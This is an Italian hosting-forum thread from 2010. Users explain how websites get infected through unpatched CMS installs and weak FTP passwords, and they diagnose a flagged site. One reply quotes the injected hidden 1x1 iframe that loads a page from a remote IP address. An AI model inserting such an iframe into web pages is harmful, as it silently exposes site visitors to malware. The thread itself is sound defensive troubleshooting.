Modo discussione | Modo lineare

Elisabetta · 29-01-2010, 18:25

Ho appena visitato un sito (che non so se posso citare).
Mi si è aperta una finestra con un messaggio di avvertenza sulla dannosità del suddetto dominio in quanto contenente un malware etc etc.

Ho fatto qualche ricerca e ho letto che il sito "ha contenuto un malware fino a 90 giorni fa"... (così ho interpretato il messaggio)

Inoltre viene anche fatto un elenco degli altri "siti infettati"...

Qualcuno mi sa spiegare come viene infettato un sito?
Mi viene da pensare "con un upload di un virus da parte dell'amministratore o peggio di qualche utente"...

Altro per chiarirmi le idee?

Non ricordo quale pannello permetteva lo scan del proprio spazio per individuare virus. Con Direct Admin non è possibile?

Grazie a chiunque voglia darmi qualche dritta!

Gandalf · 30-01-2010, 00:49

Ciao Elisabetta.
Posta pure il sito.

Comunque sia, al giorno d'oggi i siti vengono "infettati" tramite CMS buggati e non aggiornati da parte degli utenti (wordpress e joomla in primis) e/o grazie a password FTP troppo scadenti.

Solitamente il malintenzionato sostituisce la homepage del sito inserendo del codice javascript malevolo a fine pagina che spesso comporta a dei redirect su siti pedo-pornografici.

Non è la prima volta che la Polizia Postale ci fa staccare dei siti e/o fornire tutti i log di accesso.

Quando alla scansione, difficilmente i moderni antivirus riescono ad identificare il problema. Si tratta nel 99% dei casi di Javascript, che alla fin fine è codice legittimo. E' il sito a cui si fa il redirect che lo rende malevolo. In pratica, se il redirect fosse fatto verso google, il codice sarebbe perfettamente legittimo, se, invece, il redirect lo fai ad un sito pedopornografico è tutta un altra storia.
Ma non è il codice ad essere malevolo.

Alcune varianti anzichè fare un redirect inseriscono immagini nel sito dell'utente caricandole direttamente da siti osceni.

(per semplificare molto...)

Gandalf · 30-01-2010, 00:50

(30-01-2010 00:49)Gandalf Ha scritto: : https://www.web4web.it/forum/post-1002.html#pid1002Ciao Elisabetta.
Posta pure il sito. Ma è da noi?

Comunque sia, al giorno d'oggi i siti vengono "infettati" tramite CMS buggati e non aggiornati da parte degli utenti (wordpress e joomla in primis) e/o grazie a password FTP troppo scadenti.

Solitamente il malintenzionato sostituisce la homepage del sito inserendo del codice javascript malevolo a fine pagina che spesso comporta a dei redirect su siti pedo-pornografici.

Non è la prima volta che la Polizia Postale ci fa staccare dei siti e/o fornire tutti i log di accesso.

Quando alla scansione, difficilmente i moderni antivirus riescono ad identificare il problema. Si tratta nel 99% dei casi di Javascript, che alla fin fine è codice legittimo. E' il sito a cui si fa il redirect che lo rende malevolo. In pratica, se il redirect fosse fatto verso google, il codice sarebbe perfettamente legittimo, se, invece, il redirect lo fai ad un sito pedopornografico è tutta un altra storia.
Ma non è il codice ad essere malevolo.

Alcune varianti anzichè fare un redirect inseriscono immagini nel sito dell'utente caricandole direttamente da siti osceni.

(per semplificare molto...)

Pirosauro · 30-01-2010, 11:35

(30-01-2010 00:50)Gandalf Ha scritto: : https://www.web4web.it/forum/post-1003.html#pid1003Posta pure il sito. Ma è da noi?

qui ci sono solo siti di qualità Big Grin

Elisabetta · 30-01-2010, 12:51

Grazie Gandalf,
sempre chiaro e gentile... smacchi anche in profondità?

Il sito non so se è da voi... ad ogni modo mi compare per qualche secondo e poi si oscura tutto con l'avviso che mi chiede se voglio proseguire a mio rischio e pericolo oppure uscire fuori.

Te lo invio in pvt.

Pirosauro · 30-01-2010, 14:04

grazie ad Elisabetta, che ha passato il link anche a me Tooth

il problema è questo codice:

Codice HTML:

<iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>

da una veloce ricerca, sembra che sia dovuto ad un malaware installato nel pc di chi ha accesso ai template, il quale aggiunge un frame malevolo al codice html
Sarebbe meglio avvertire l'ammistratore del sito, perchè la minaccia è ancora presente.

Elisabetta · 30-01-2010, 14:18

Semplicemente fantastici!

Grazie!

...vedrò di contattare l'amministratore!

Elisabetta · 01-02-2010, 11:47

...ho contattato l'amministratore... mi è arrivata la conferma lettura (ma senza una risposta di ringraziamento... Confused

)

Adesso il sito non è raggiungibile, compare la pagina del loro gestore hosting... Angel

....giusto per aggiornarvi...

Pirosauro · 01-02-2010, 15:54

(01-02-2010 11:47)Elisabetta Ha scritto: : https://www.web4web.it/forum/post-1012.html#pid1012Adesso il sito non è raggiungibile, compare la pagina del loro gestore hosting...

chi è ?

indagine di mercato Big Grin

probabilmente stanno facendo la cosa giusta: una re-installazione di tutto da zero.

Elisabetta · 01-02-2010, 22:52

(01-02-2010 15:54)Pirosauro Ha scritto: : https://www.web4web.it/forum/post-1012.html#pid1012Adesso il sito non è raggiungibile, compare la pagina del loro gestore hosting...

chi è ?

indagine di mercato Big Grin

probabilmente stanno facendo la cosa giusta: una re-installazione di tutto da zero.
Il link lo sai.. vai così lo scoprirai! Whistling

Ci sono stata anche io con loro, avevo un VPS... non sono affatto male. Devo essere sincera!

Una re-installazione da zero?
Huh

mi fa paura solo al pensiero!

Altri utenti che stanno visualizzando questa discussione
1 utente stanno visualizzando questa discussione: (0 membri, e 1 visitatore).